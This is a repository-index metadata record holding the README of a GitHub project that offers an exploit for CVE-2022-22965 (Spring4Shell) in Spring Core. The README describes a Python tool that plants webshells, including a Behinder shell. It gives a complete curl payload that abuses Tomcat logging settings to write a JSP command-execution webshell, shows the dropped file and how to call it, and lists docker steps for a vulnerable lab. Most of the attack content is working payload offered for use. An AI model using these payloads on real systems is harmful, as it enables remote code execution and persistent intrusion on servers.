{"id":21904854,"url":"https://github.com/mr-xn/spring-core-rce","last_synced_at":"2025-04-15T22:59:12.596Z","repository":{"id":43597360,"uuid":"475918792","full_name":"Mr-xn/spring-core-rce","owner":"Mr-xn","description":"CVE-2022-22965 : about spring core rce","archived":false,"fork":false,"pushed_at":"2022-04-01T15:34:03.000Z","size":15495,"stargazers_count":50,"open_issues_count":0,"forks_count":18,"subscribers_count":2,"default_branch":"main","last_synced_at":"2025-04-15T22:59:07.341Z","etag":null,"topics":["cve-2022-22965","spring","spring-mvc","spring-security"],"latest_commit_sha":null,"homepage":"","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/Mr-xn.png","metadata":{"files":{"readme":"README.MD","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null}},"created_at":"2022-03-30T14:35:00.000Z","updated_at":"2025-03-09T18:29:16.000Z","dependencies_parsed_at":"2022-09-14T13:12:13.125Z","dependency_job_id":null,"html_url":"https://github.com/Mr-xn/spring-core-rce","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Mr-xn%2Fspring-core-rce","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Mr-xn%2Fspring-core-rce/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Mr-xn%2Fspring-core-rce/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Mr-xn%2Fspring-core-rce/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/Mr-xn","download_url":"https://codeload.github.com/Mr-xn/spring-core-rce/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":249167440,"owners_count":21223505,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["cve-2022-22965","spring","spring-mvc","spring-security"],"created_at":"2024-11-28T16:19:28.451Z","updated_at":"2025-04-15T22:59:12.576Z","avatar_url":"https://github.com/Mr-xn.png","language":"Python","funding_links":[],"categories":[],"sub_categories":[],"readme":"## CVE-2022-22965: Spring-Core-Rce \n\n## EXP\n\n特性:\n\n1. 漏洞探测(不写入 webshell，简单字符串输出)\n2. 自定义写入 webshell 文件名称及路径\n3. 不会追加写入到同一文件中，每次检测写入到不同名称 webshell 文件\n4. 支持写入 冰蝎 webshell\n5. 代理支持，可以设置自定义的代理，比如: http://127.0.0.1:8080 \n\n使用:\n\n```python3\n$ python3 exp.py -h\nusage: exp.py [-h] --url URL --type TYPE [--directory DIRECTORY] [--filename FILENAME]\n              [--proxy PROXY]\n\nSrping Core Rce.\n\noptional arguments:\n  -h, --help            show this help message and exit\n  --url URL             target url,eg: http://127.0.0.1:8082/helloworld/greeting\n  --type TYPE           1 vuln test 2.Behinder shell\n  --directory DIRECTORY\n                        shell directory,eg: webapps/ROOT(Notice: if the path not exists will creat!)\n  --filename FILENAME   shell name\n  --proxy PROXY         set request proxy,eg: http://127.0.0.1:8080\n\n\n```\n比如：\n\n```bash\n$ python3 exp.py --url http://127.0.0.1:8082/helloworld/greeting --type 1 --proxy http://127.0.0.1:8080\n[*] waiting for 10s...\n[+] inject success, vulnerable!\n[+] test at: http://127.0.0.1:8082/inject30297.jsp\n[*] Response:\nchallenge\n\u003c!--\n\n```\n\n## POC\n\n直接写入 webshell\n```bash\ncurl -v -H \"c1: runtime\" -H \"c2: \u003c%\" -H \"suffix: %\u003e//\" -d \"class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bc2%7Di%20if(%22j%22.equals(request.getParameter(%22pwd%22)))%7B%20java.io.InputStream%20in%20%3D%20%25%7Bc1%7Di.getRuntime().exec(request.getParameter(%22cmd%22)).getInputStream()%3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20while((a%3Din.read(b))3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%20%7D%20%25%7Bsuffix%7Di\u0026class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp\u0026class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT\u0026class.module.classLoader.resources.context.parent.pipeline.first.prefix=tomcatwar\u0026class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat=\" http://target:8080/path\n```\n\nThe file is dropped to disk:\n\n```\ncat ./apache-tomcat-8.5.77/webapps/ROOT/tomcatwar.jsp \n- if(\"j\".equals(request.getParameter(\"pwd\"))){ java.io.InputStream in = -.getRuntime().exec(request.getParameter(\"cmd\")).getInputStream(); int a = -1; byte[] b = new byte[2048]; while((a=in.read(b))3D-1){ out.println(new String(b)); } } -\n```\n\nshell: `target/tomcatwar.jsp?pwd=j\u0026cmd=whoami`\n\n\n### 环境搭建\n\n#### 使用 vulfocus\nROOT.war 来自白帽汇的 vulfocus 镜像,直接放在 jdk9+ 的 tomcat 环境部署即可启动测试.\n\n也可以自行使用 docker pull\n\n```\ndocker run -d -p 8082:8080 --name springrce -it vulfocus/spring-core-rce-2022-03-29\n```\n\n然后访问 本地的 8082 端口，显示 OK,即运行成功\n\n\n#### 使用 Spring4Shell-POC\n\n克隆 https://github.com/lunasec-io/Spring4Shell-POC 然后进入 Spring4Shell-POC 执行 docker 编译启动即可\n\n```\ndocker build -f Dockerfile . -t spring4shell \u0026\u0026 docker run -p 8082:8080 spring4shell\n\n[+] Building 1.4s (12/12) FINISHED                                                                    \n =\u003e [internal] load build definition from Dockerfile                                             0.0s\n =\u003e =\u003e transferring dockerfile: 37B                                                              0.0s\n =\u003e [internal] load .dockerignore                                                                0.0s\n =\u003e =\u003e transferring context: 2B                                                                  0.0s\n =\u003e [internal] load metadata for docker.io/library/tomcat:9.0                                    1.3s\n =\u003e [internal] load build context                                                                0.0s\n =\u003e =\u003e transferring context: 965B                                                                0.0s\n =\u003e [1/7] FROM docker.io/library/tomcat:9.0@sha256:9920e45babbbda16cc0f7b939349e1443cc6e0922272  0.0s\n =\u003e CACHED [2/7] ADD src/ /helloworld/src                                                        0.0s\n =\u003e CACHED [3/7] ADD pom.xml /helloworld                                                         0.0s\n =\u003e CACHED [4/7] RUN apt update \u0026\u0026 apt install maven -y                                          0.0s\n =\u003e CACHED [5/7] WORKDIR /helloworld/                                                            0.0s\n =\u003e CACHED [6/7] RUN mvn clean package                                                           0.0s\n =\u003e CACHED [7/7] RUN mv target/helloworld.war /usr/local/tomcat/webapps/                         0.0s\n =\u003e exporting to image                                                                           0.0s\n =\u003e =\u003e exporting layers                                                                          0.0s\n =\u003e =\u003e writing image sha256:7b1b653307234587dde30fa2f26b2f3211b2bc8bdb38b4b43f2c321ddda1ee25     0.0s\n =\u003e =\u003e naming to docker.io/library/spring4shell                                                  0.0s\n\nUse 'docker scan' to run Snyk tests against images to find vulnerabilities and learn how to fix them\nNOTE: Picked up JDK_JAVA_OPTIONS:  --add-opens=java.base/java.lang=ALL-UNNAMED --add-opens=java.base/java.io=ALL-UNNAMED --add-opens=java.base/java.util=ALL-UNNAMED --add-opens=java.base/java.util.concurrent=ALL-UNNAMED --add-opens=java.rmi/sun.rmi.transport=ALL-UNNAMED\n01-Apr-2022 15:11:43.950 INFO [main] org.apache.catalina.startup.VersionLoggerListener.log Server version name:   Apache Tomcat/9.0.60\n01-Apr-2022 15:11:43.956 INFO [main] org.apache.catalina.startup.VersionLoggerListener.log Server built:          Mar 9 2022 14:52:25 UTC\n01-Apr-2022 15:11:43.956 INFO [main] org.apache.catalina.startup.VersionLoggerListener.log Server version number: 9.0.60.0\n01-Apr-2022 15:11:43.956 INFO [main] org.apache.catalina.startup.VersionLoggerListener.log OS Name:               Linux\n01-Apr-2022 15:11:43.956 INFO [main] org.apache.catalina.startup.VersionLoggerListener.log OS Version:            5.10.76-linuxkit\n01-Apr-2022 15:11:43.957 INFO [main] org.apache.catalina.startup.VersionLoggerListener.log Architecture:          amd64\n01-Apr-2022 15:11:43.957 INFO [main] org.apache.catalina.startup.VersionLoggerListener.log Java Home:             /usr/local/openjdk-11\n01-Apr-2022 15:11:43.957 INFO [main] org.apache.catalina.startup.VersionLoggerListener.log JVM Version:           11.0.14.1+1\n01-Apr-2022 15:11:43.957 INFO [main] org.apache.catalina.startup.VersionLoggerListener.log JVM Vendor:            Oracle Corporation\n01-Apr-2022 15:11:43.957 INFO [main] org.apache.catalina.startup.VersionLoggerListener.log CATALINA_BASE:         /usr/local/tomcat\n01-Apr-2022 15:11:43.957 INFO [main] org.apache.catalina.startup.VersionLoggerListener.log CATALINA_HOME:         /usr/local/tomcat\n01-Apr-2022 15:11:43.970 INFO [main] org.apache.catalina.startup.VersionLoggerListener.log Command line argument: --add-opens=java.base/java.lang=ALL-UNNAMED\n01-Apr-2022 15:11:43.970 INFO [main] org.apache.catalina.startup.VersionLoggerListener.log Command line argument: --add-opens=java.base/java.io=ALL-UNNAMED\n01-Apr-2022 15:11:43.971 INFO [main] org.apache.catalina.startup.VersionLoggerListener.log Command line argument: --add-opens=java.base/java.util=ALL-UNNAMED\n01-Apr-2022 15:11:43.971 INFO [main] org.apache.catalina.startup.VersionLoggerListener.log Command line argument: --add-opens=java.base/java.util.concurrent=ALL-UNNAMED\n01-Apr-2022 15:11:43.971 INFO [main] org.apache.catalina.startup.VersionLoggerListener.log Command line argument: --add-opens=java.rmi/sun.rmi.transport=ALL-UNNAMED\n01-Apr-2022 15:11:43.971 INFO [main] org.apache.catalina.startup.VersionLoggerListener.log Command line argument: -Djava.util.logging.config.file=/usr/local/tomcat/conf/logging.properties\n01-Apr-2022 15:11:43.972 INFO [main] org.apache.catalina.startup.VersionLoggerListener.log Command line argument: -Djava.util.logging.manager=org.apache.juli.ClassLoaderLogManager\n01-Apr-2022 15:11:43.972 INFO [main] org.apache.catalina.startup.VersionLoggerListener.log Command line argument: -Djdk.tls.ephemeralDHKeySize=2048\n01-Apr-2022 15:11:43.972 INFO [main] org.apache.catalina.startup.VersionLoggerListener.log Command line argument: -Djava.protocol.handler.pkgs=org.apache.catalina.webresources\n01-Apr-2022 15:11:43.972 INFO [main] org.apache.catalina.startup.VersionLoggerListener.log Command line argument: -Dorg.apache.catalina.security.SecurityListener.UMASK=0027\n01-Apr-2022 15:11:43.973 INFO [main] org.apache.catalina.startup.VersionLoggerListener.log Command line argument: -Dignore.endorsed.dirs=\n01-Apr-2022 15:11:43.973 INFO [main] org.apache.catalina.startup.VersionLoggerListener.log Command line argument: -Dcatalina.base=/usr/local/tomcat\n01-Apr-2022 15:11:43.973 INFO [main] org.apache.catalina.startup.VersionLoggerListener.log Command line argument: -Dcatalina.home=/usr/local/tomcat\n01-Apr-2022 15:11:43.973 INFO [main] org.apache.catalina.startup.VersionLoggerListener.log Command line argument: -Djava.io.tmpdir=/usr/local/tomcat/temp\n01-Apr-2022 15:11:43.977 INFO [main] org.apache.catalina.core.AprLifecycleListener.lifecycleEvent Loaded Apache Tomcat Native library [1.2.31] using APR version [1.7.0].\n01-Apr-2022 15:11:43.977 INFO [main] org.apache.catalina.core.AprLifecycleListener.lifecycleEvent APR capabilities: IPv6 [true], sendfile [true], accept filters [false], random [true], UDS [true].\n01-Apr-2022 15:11:43.977 INFO [main] org.apache.catalina.core.AprLifecycleListener.lifecycleEvent APR/OpenSSL configuration: useAprConnector [false], useOpenSSL [true]\n01-Apr-2022 15:11:43.980 INFO [main] org.apache.catalina.core.AprLifecycleListener.initializeSSL OpenSSL successfully initialized [OpenSSL 1.1.1n  15 Mar 2022]\n01-Apr-2022 15:11:44.251 INFO [main] org.apache.coyote.AbstractProtocol.init Initializing ProtocolHandler [\"http-nio-8080\"]\n01-Apr-2022 15:11:44.271 INFO [main] org.apache.catalina.startup.Catalina.load Server initialization in [511] milliseconds\n01-Apr-2022 15:11:44.313 INFO [main] org.apache.catalina.core.StandardService.startInternal Starting service [Catalina]\n01-Apr-2022 15:11:44.313 INFO [main] org.apache.catalina.core.StandardEngine.startInternal Starting Servlet engine: [Apache Tomcat/9.0.60]\n01-Apr-2022 15:11:44.329 INFO [main] org.apache.catalina.startup.HostConfig.deployWAR Deploying web application archive [/usr/local/tomcat/webapps/helloworld.war]\n01-Apr-2022 15:11:45.358 INFO [main] org.apache.jasper.servlet.TldScanner.scanJars At least one JAR was scanned for TLDs yet contained no TLDs. Enable debug logging for this logger for a complete list of JARs that were scanned but no TLDs were found in them. Skipping unneeded JARs during scanning can improve startup time and JSP compilation time.\n\n  .   ____          _            __ _ _\n /\\\\ / ___'_ __ _ _(_)_ __  __ _ \\ \\ \\ \\\n( ( )\\___ | '_ | '_| | '_ \\/ _` | \\ \\ \\ \\\n \\\\/  ___)| |_)| | | | | || (_| |  ) ) ) )\n  '  |____| .__|_| |_|_| |_\\__, | / / / /\n =========|_|==============|___/=/_/_/_/\n :: Spring Boot ::                (v2.6.3)\n\n2022-04-01 15:11:45.952  INFO 1 --- [           main] c.r.helloworld.HelloworldApplication     : Starting HelloworldApplication v0.0.1-SNAPSHOT using Java 11.0.14.1 on 00bf66f10525 with PID 1 (/usr/local/tomcat/webapps/helloworld/WEB-INF/classes started by root in /helloworld)\n2022-04-01 15:11:45.956  INFO 1 --- [           main] c.r.helloworld.HelloworldApplication     : No active profile set, falling back to default profiles: default\n2022-04-01 15:11:46.614  INFO 1 --- [           main] w.s.c.ServletWebServerApplicationContext : Root WebApplicationContext: initialization completed in 638 ms\n2022-04-01 15:11:47.137  INFO 1 --- [           main] c.r.helloworld.HelloworldApplication     : Started HelloworldApplication in 1.618 seconds (JVM running for 3.594)\n01-Apr-2022 15:11:47.157 INFO [main] org.apache.catalina.startup.HostConfig.deployWAR Deployment of web application archive [/usr/local/tomcat/webapps/helloworld.war] has finished in [2,828] ms\n01-Apr-2022 15:11:47.169 INFO [main] org.apache.coyote.AbstractProtocol.start Starting ProtocolHandler [\"http-nio-8080\"]\n01-Apr-2022 15:11:47.179 INFO [main] org.apache.catalina.startup.Catalina.start Server startup in [2908] milliseconds\n```\n\n然后访问 http://127.0.0.1:8082/helloworld/greeting  \n\n\u003cimg width=\"540\" alt=\"image\" src=\"https://user-images.githubusercontent.com/18260135/161292061-9c9d5432-caff-47f8-926b-7c33a1d891ec.png\"\u003e\n\nReference：\n- https://github.com/jbaines-r7/spring4shell_vulnapp \n- https://github.com/liangyueliangyue/spring-core-rce\n- https://github.com/lunasec-io/Spring4Shell-POC\n- https://www.t00ls.cc/thread-65239-1-1.html\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fmr-xn%2Fspring-core-rce","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fmr-xn%2Fspring-core-rce","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fmr-xn%2Fspring-core-rce/lists"}